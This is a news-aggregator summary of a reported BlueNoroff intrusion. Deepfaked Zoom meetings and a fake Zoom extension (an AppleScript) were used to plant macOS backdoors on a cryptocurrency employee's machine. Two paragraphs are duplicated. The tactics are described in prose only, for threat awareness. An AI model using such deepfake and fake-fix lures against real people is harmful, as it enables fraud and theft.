CyberSecurity news
FlagThis
info@thehackernews.com (The@The Hacker News
//
BlueNoroff, a North Korean APT group, has been observed employing sophisticated tactics to target individuals in the Web3 and cryptocurrency sectors. This group, also known as TA444, Sapphire Sleet, COPERNICIUM, STARDUST CHOLLIMA, or CageyChameleon, is known for its financially motivated operations dating back to at least 2017. Their recent methods involve deceiving targets through fake Zoom calls, complete with deepfaked company executives, to trick them into installing malware on their macOS devices.
Huntress revealed details of a recent cyber intrusion where an employee at a cryptocurrency foundation received a message on Telegram from an external contact requesting a meeting. The contact sent a Calendly link which redirected the employee to a fake Zoom domain controlled by the attackers. After weeks the employee joined a group Zoom meeting featuring deepfakes of senior leaders from their own company, along with other external contacts. When the employee was unable to use their microphone, the synthetic personas urged the target to download and install a Zoom extension supposedly to fix the problem, delivered through a link sent via Telegram.
This malicious extension, disguised as "zoom_sdk_support.scpt," is actually an AppleScript. The script first opens a legitimate Zoom SDK webpage as a distraction. However, hidden within the script is code that downloads a next-stage payload from a remote server, which proceeds to disable bash history logging and checks for the presence of Rosetta 2 (for running x86_64 binaries on Apple Silicon Macs). It creates a hidden file and downloads binaries from malicious Zoom web pages. The script prompts the user for their system password and wipes command history to cover its tracks. Analysis of compromised systems reveals the presence of multiple malicious binaries, including a Nim-based backdoor and a Go backdoor used for remote command execution and malware deployment.
ImgSrc: blogger.googleu
References :
Huntress revealed details of a recent cyber intrusion where an employee at a cryptocurrency foundation received a message on Telegram from an external contact requesting a meeting. The contact sent a Calendly link which redirected the employee to a fake Zoom domain controlled by the attackers. After weeks the employee joined a group Zoom meeting featuring deepfakes of senior leaders from their own company, along with other external contacts. When the employee was unable to use their microphone, the synthetic personas urged the target to download and install a Zoom extension supposedly to fix the problem, delivered through a link sent via Telegram.
This malicious extension, disguised as "zoom_sdk_support.scpt," is actually an AppleScript. The script first opens a legitimate Zoom SDK webpage as a distraction. However, hidden within the script is code that downloads a next-stage payload from a remote server, which proceeds to disable bash history logging and checks for the presence of Rosetta 2 (for running x86_64 binaries on Apple Silicon Macs). It creates a hidden file and downloads binaries from malicious Zoom web pages. The script prompts the user for their system password and wipes command history to cover its tracks. Analysis of compromised systems reveals the presence of multiple malicious binaries, including a Nim-based backdoor and a Go backdoor used for remote command execution and malware deployment.
ImgSrc: blogger.googleu
Share:
References :
- Know Your Adversary: Huntress has shared the of analysis of a recent BlueNoroff attack involving a macOS device, a fake Zoom extension and even deepfakes!
- The Hacker News: BlueNoroff Deepfake Zoom Scam Hits Crypto Employee with macOS Backdoor Malware
- Blog: Key findings The Field Effect Analysis team has been investigating an incident involving a Canadian online gambling provider, where a threat actor employed social engineering tactics to take control of a victim’s computer and deploy infostealer malware.
- www.huntress.com: Inside BlueNoroff Web3 Intrusion Analysis
Classification:
- HashTags: #BlueNoroff #macOSMalware #Web3Security
- Company: Huntress
- Target: Cryptocurrency professionals
- Attacker: BlueNoroff
- Product: Zoom
- Feature: fake Zoom calls
- Malware: NodeInitRAT
- Type: Malware
- Severity: Major